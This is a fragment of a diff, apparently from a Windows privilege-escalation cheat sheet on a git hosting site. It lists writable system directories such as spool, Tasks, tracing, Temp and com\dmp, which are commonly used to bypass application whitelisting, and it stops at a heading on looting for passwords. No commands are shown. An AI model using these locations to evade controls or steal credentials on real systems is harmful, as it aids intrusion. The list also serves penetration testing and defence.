|
||||||
C:\Windows\System32\spool\drivers\color
|
C:\Windows\System32\spool\drivers\color
|
||||||
C:\Windows\Tasks
|
C:\Windows\System32\spool\printers
|
||||||
|
C:\Windows\System32\spool\servers
|
||||||
C:\Windows\tracing
|
C:\Windows\tracing
|
||||||
C:\Windows\Temp
|
C:\Windows\Temp
|
||||||
C:\Users\Public
|
C:\Users\Public
|
||||||
|
C:\Windows\Tasks
|
||||||
|
C:\Windows\System32\tasks
|
||||||
|
C:\Windows\SysWOW64\tasks
|
||||||
|
C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system
|
||||||
|
C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system
|
||||||
|
C:\Windows\debug\wia
|
||||||
|
C:\Windows\registration\crmlog
|
||||||
|
C:\Windows\System32\com\dmp
|
||||||
|
C:\Windows\SysWOW64\com\dmp
|
||||||
|
C:\Windows\System32\fxstmp
|
||||||
|
C:\Windows\SysWOW64\fxstmp
|
||||||
```
|
```
|
||||||
|
|
||||||
## EoP - Looting for passwords
|
## EoP - Looting for passwords
|
||||||
|
Loading…
Reference in New Issue
Block a user